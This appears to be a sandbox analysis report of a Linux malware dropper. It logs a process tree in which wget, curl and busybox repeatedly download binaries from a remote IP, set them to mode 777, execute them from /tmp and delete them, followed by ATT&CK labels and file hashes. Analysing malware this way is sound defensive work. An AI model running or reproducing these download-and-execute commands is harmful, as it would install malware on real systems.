/usr/bin/curlcurl -O http://87.120.84.230/bins/4nLqolMkFfn5Q2QNB4qrSTSlHHPfu9kOkb2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:951
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/4nLqolMkFfn5Q2QNB4qrSTSlHHPfu9kOkb2⤵PID:952
-
-
/bin/chmodchmod 777 4nLqolMkFfn5Q2QNB4qrSTSlHHPfu9kOkb2⤵
- File and Directory Permissions Modification
PID:953
-
-
/tmp/4nLqolMkFfn5Q2QNB4qrSTSlHHPfu9kOkb./4nLqolMkFfn5Q2QNB4qrSTSlHHPfu9kOkb2⤵
- Executes dropped EXE
PID:954
-
-
/bin/rmrm 4nLqolMkFfn5Q2QNB4qrSTSlHHPfu9kOkb2⤵PID:955
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/D6LuxfDpXNy9rxMbPnif7NLzSKpC22CCSz2⤵PID:956
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/D6LuxfDpXNy9rxMbPnif7NLzSKpC22CCSz2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:957
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/D6LuxfDpXNy9rxMbPnif7NLzSKpC22CCSz2⤵PID:958
-
-
/bin/chmodchmod 777 D6LuxfDpXNy9rxMbPnif7NLzSKpC22CCSz2⤵
- File and Directory Permissions Modification
PID:959
-
-
/tmp/D6LuxfDpXNy9rxMbPnif7NLzSKpC22CCSz./D6LuxfDpXNy9rxMbPnif7NLzSKpC22CCSz2⤵
- Executes dropped EXE
PID:960
-
-
/bin/rmrm D6LuxfDpXNy9rxMbPnif7NLzSKpC22CCSz2⤵PID:961
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/pAmIB4sk5yCuRWIk7h1hYLhnwpUSlg4Xxm2⤵PID:962
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/pAmIB4sk5yCuRWIk7h1hYLhnwpUSlg4Xxm2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:963
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/pAmIB4sk5yCuRWIk7h1hYLhnwpUSlg4Xxm2⤵PID:964
-
-
/bin/chmodchmod 777 pAmIB4sk5yCuRWIk7h1hYLhnwpUSlg4Xxm2⤵
- File and Directory Permissions Modification
PID:965
-
-
/tmp/pAmIB4sk5yCuRWIk7h1hYLhnwpUSlg4Xxm./pAmIB4sk5yCuRWIk7h1hYLhnwpUSlg4Xxm2⤵
- Executes dropped EXE
PID:966
-
-
/bin/rmrm pAmIB4sk5yCuRWIk7h1hYLhnwpUSlg4Xxm2⤵PID:967
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/JthsMXwzlHBXiVQeiqTBVfvcaP24dnBmuQ2⤵PID:968
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/JthsMXwzlHBXiVQeiqTBVfvcaP24dnBmuQ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:969
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/JthsMXwzlHBXiVQeiqTBVfvcaP24dnBmuQ2⤵PID:970
-
-
/bin/chmodchmod 777 JthsMXwzlHBXiVQeiqTBVfvcaP24dnBmuQ2⤵
- File and Directory Permissions Modification
PID:971
-
-
/tmp/JthsMXwzlHBXiVQeiqTBVfvcaP24dnBmuQ./JthsMXwzlHBXiVQeiqTBVfvcaP24dnBmuQ2⤵
- Executes dropped EXE
PID:972
-
-
/bin/rmrm JthsMXwzlHBXiVQeiqTBVfvcaP24dnBmuQ2⤵PID:973
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/FhITldMHonjpiCltv4sk55YKSWt040cZ3V2⤵PID:974
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/FhITldMHonjpiCltv4sk55YKSWt040cZ3V2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:975
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/FhITldMHonjpiCltv4sk55YKSWt040cZ3V2⤵PID:976
-
-
/bin/chmodchmod 777 FhITldMHonjpiCltv4sk55YKSWt040cZ3V2⤵
- File and Directory Permissions Modification
PID:977
-
-
/tmp/FhITldMHonjpiCltv4sk55YKSWt040cZ3V./FhITldMHonjpiCltv4sk55YKSWt040cZ3V2⤵
- Executes dropped EXE
PID:978
-
-
/bin/rmrm FhITldMHonjpiCltv4sk55YKSWt040cZ3V2⤵PID:979
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/yRFx7dApmj2zj7WJZMzgClnjukSVEtqQpN2⤵PID:980
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/yRFx7dApmj2zj7WJZMzgClnjukSVEtqQpN2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:981
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/yRFx7dApmj2zj7WJZMzgClnjukSVEtqQpN2⤵PID:982
-
-
/bin/chmodchmod 777 yRFx7dApmj2zj7WJZMzgClnjukSVEtqQpN2⤵
- File and Directory Permissions Modification
PID:983
-
-
/tmp/yRFx7dApmj2zj7WJZMzgClnjukSVEtqQpN./yRFx7dApmj2zj7WJZMzgClnjukSVEtqQpN2⤵
- Executes dropped EXE
PID:984
-
-
/bin/rmrm yRFx7dApmj2zj7WJZMzgClnjukSVEtqQpN2⤵PID:985
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/vgeI6ZfhxHZrKSX06sG1p4uo4aUQzHZy5I2⤵PID:986
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/vgeI6ZfhxHZrKSX06sG1p4uo4aUQzHZy5I2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:987
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/vgeI6ZfhxHZrKSX06sG1p4uo4aUQzHZy5I2⤵PID:988
-
-
/bin/chmodchmod 777 vgeI6ZfhxHZrKSX06sG1p4uo4aUQzHZy5I2⤵
- File and Directory Permissions Modification
PID:989
-
-
/tmp/vgeI6ZfhxHZrKSX06sG1p4uo4aUQzHZy5I./vgeI6ZfhxHZrKSX06sG1p4uo4aUQzHZy5I2⤵
- Executes dropped EXE
PID:990
-
-
/bin/rmrm vgeI6ZfhxHZrKSX06sG1p4uo4aUQzHZy5I2⤵PID:991
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97